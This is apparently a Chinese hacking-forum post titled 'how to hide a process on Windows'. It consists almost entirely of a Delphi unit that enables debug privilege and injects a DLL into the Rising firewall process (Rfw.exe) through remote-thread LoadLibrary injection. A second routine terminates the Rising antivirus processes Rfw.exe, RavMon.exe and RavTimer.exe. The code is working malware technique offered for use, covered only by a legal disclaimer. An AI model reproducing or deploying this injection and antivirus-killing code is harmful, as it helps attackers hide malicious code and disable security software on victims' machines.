HanDs
NO.2

[Delphi文章] 如何在Windows平台下实现进程隐藏 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  StdCtrls, tlhelp32;
{type
  TProcessEntry32 = record
    dwSize: DWORD;
    cntUsage: DWORD;
    th32ProcessID: DWORD;
    th32DefaultHeapID: DWORD;
    th32ModuleID: DWORD;
    cntThreads: DWORD;
    th32ParentProcessID: DWORD;
    pcPriClassBase: integer;
    dwFlags: DWORD;
    szExeFile: array[0..MAX_PATH - 1] of char;
  end; }
type
  TForm1 = class(TForm)
    Button1: TButton;
    Button2: TButton;
    procedure Button1Click(Sender: TObject);
    procedure Button2Click(Sender: TObject);
  private
    function TerminateAProcess(var HostFile: string):Boolean;
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.DFM}

procedure FindAProcess(const AFilename: string; const PathMatch: Boolean; var ProcessID: DWORD);
var
  lppe: TProcessEntry32;
  SsHandle: Thandle;
  FoundAProc, FoundOK: boolean;
begin
  ProcessID :=0;
  SsHandle := CreateToolHelp32SnapShot(TH32CS_SnapProcess, 0);
  FoundAProc := Process32First(Sshandle, lppe);
  while FoundAProc do
  begin
    if PathMatch then
      FoundOK := AnsiStricomp(lppe.szExefile, PChar(AFilename)) = 0
    else
      FoundOK := AnsiStricomp(PChar(ExtractFilename(lppe.szExefile)), PChar(ExtractFilename(AFilename))) = 0;
    if FoundOK then
    begin
      ProcessID := lppe.th32ProcessID;
      break;
    end;
    FoundAProc := Process32Next(SsHandle, lppe);
  end;
  CloseHandle(SsHandle);
end;

function EnabledDebugPrivilege(const bEnabled: Boolean): Boolean;
var
  hToken: THandle;
  tp: TOKEN_PRIVILEGES;
  a: DWORD;
const
  SE_DEBUG_NAME = 'SeDebugPrivilege';
begin
  Result := False;
  if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) then
  begin
    tp.PrivilegeCount := 1;
    LookupPrivilegeValue(nil, SE_DEBUG_NAME, tp.Privileges[0].Luid);
    if bEnabled then
      tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
    else
      tp.Privileges[0].Attributes := 0;
    a := 0;
    AdjustTokenPrivileges(hToken, False, tp, SizeOf(tp), nil, a);
    Result := GetLastError = ERROR_SUCCESS;
    CloseHandle(hToken);
  end;
end;

function AttachToProcess(const HostFile, GuestFile: string; const PID: DWORD = 0): DWORD;
var
  hRemoteProcess: THandle;
  dwRemoteProcessId: DWORD;
  cb: DWORD;
  pszLibFileRemote: Pointer;
  iReturnCode: Boolean;
  TempVar: DWORD;
  pfnStartAddr: TFNThreadStartRoutine;
  pszLibAFilename: PwideChar;
begin
  Result := 0;
  EnabledDebugPrivilege(True);
  Getmem(pszLibAFilename, Length(GuestFile) * 2 + 1);
  StringToWideChar(GuestFile, pszLibAFilename, Length(GuestFile) * 2 + 1);
  if PID > 0 then
     dwRemoteProcessID := PID
  else
     FindAProcess(HostFile, False, dwRemoteProcessID);
  hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + {允许远程创建线程}
      PROCESS_VM_OPERATION + {允许远程VM操作}
      PROCESS_VM_WRITE, {允许远程VM写}
      FALSE, dwRemoteProcessId);
  cb := (1 + lstrlenW(pszLibAFilename)) * sizeof(WCHAR);
  pszLibFileRemote := PWIDESTRING(VirtualAllocEx(hRemoteProcess, nil, cb, MEM_COMMIT, PAGE_READWRITE));
  TempVar := 0;
  iReturnCode := WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename, cb, TempVar);
  if iReturnCode then
  begin
    pfnStartAddr := GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW');
    TempVar := 0;
    Result := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, TempVar);
  end;
  Freemem(pszLibAFilename);
end;

procedure TForm1.Button1Click(Sender: TObject);
begin
  AttachToProcess('Rfw.exe', extractfilepath(paramstr(0))+'Project2.dll');
end;

function TForm1.TerminateAProcess(var HostFile: string): Boolean;
var
  HProcessedID:DWORD;
  HProcedss:THandle;
begin
  Result:=True;
  EnabledDebugPrivilege(True);
  FindAProcess(HostFile,False,HProcessedID);
  if HProcessedID<>0 then
  begin
    HProcedss:=OpenProcess(PROCESS_TERMINATE,True,HProcessedID);
    if not TerminateProcess(HProcedss,0) then
       ShowMessage(IntToStr( GetLastError));
  end;
  EnabledDebugPrivilege(False);
end;

procedure TForm1.Button2Click(Sender: TObject);
var
  FileName:array[0..25] of String;
begin
  FileName[0]:='Rfw.exe';
  FileName[1]:='RavMon.exe';
  FileName[2]:='RavTimer.exe';
  TerminateAProcess(FileName[1]);
  TerminateAProcess(FileName[0]);
  TerminateAProcess(FileName[2]);
end;

end.


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
如何
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组